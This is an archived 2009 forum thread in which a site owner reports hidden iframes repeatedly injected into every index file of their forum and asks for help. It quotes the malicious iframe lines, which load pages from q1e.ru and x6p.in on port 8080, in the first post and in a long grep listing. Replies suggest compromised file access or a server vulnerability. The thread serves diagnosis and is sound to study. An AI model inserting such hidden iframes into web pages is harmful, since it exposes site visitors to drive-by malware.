PDA

View Full Version : my forum is inficted with unknow virus

ezak
07-26-2009, 01:57 PM
from month I face problem
that all my index* contan this code

<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>

its infect ./forum/index.php, /index.html (redirect to forum/index.php), /admincp/index.php. modcp/index.php ... and anyfile with index name will be infected


and its stop my forum
I removed alt of other scripts on that site, and scan for virus, and installed modsecuirty with most rules

and its happened again , and don't know why this problem, dose anyone know anything about this virus ?
Marco van Herwaarden
07-27-2009, 08:55 AM
What kind of server are you on? A shared server?

Most likely someone has access to your files and is editing them.
ezak
07-27-2009, 09:26 AM
I'm on VPS and all my site is mine
and the other site is not have this problem
only this one
, and that happened suddenly, change all index file with that code
its have some sites like http://q1e.ru:8080 and other similar to, don't know what is it

its happened weekly or all 5 days
Marco van Herwaarden
07-27-2009, 09:45 AM
Contact your host, most likely someone has access to your files.
ezak
07-28-2009, 07:30 AM
its give me crazy
some info form
grep -R iframe *
all my styles , and the forum index


vb/ubetube/misc/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/misc/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/ranks/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/ranks/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/avatars/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/attach/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/attach/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/gradients/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/gradients/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/smilies/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/smilies/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/buttons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/buttons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/icons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/icons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/polls/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/polls/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/statusicon/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/statusicon/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/fonts/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/regimage/fonts/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/editor/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/editor/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/reputation/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/reputation/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/rating/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb/ubetube/rating/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>

every day now , all index is contain this code
flapjack
07-28-2009, 08:38 AM
Your webserver has a vulnerability of some sort.

Probably to do with an old version of cPanel or something like that.
Marco van Herwaarden
07-30-2009, 10:44 AM
See post #4.
ezak
07-30-2009, 11:35 AM
I'm already manage this host
that is my own VPS, and I already have control to the Node server
and I don't know what to do
I have already secure my server
with CSF hard config, and install Mod_Security with most common rules

--------------- Added 1248957645 at 1248957645 ---------------

I found this maybe related with my isuss

http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/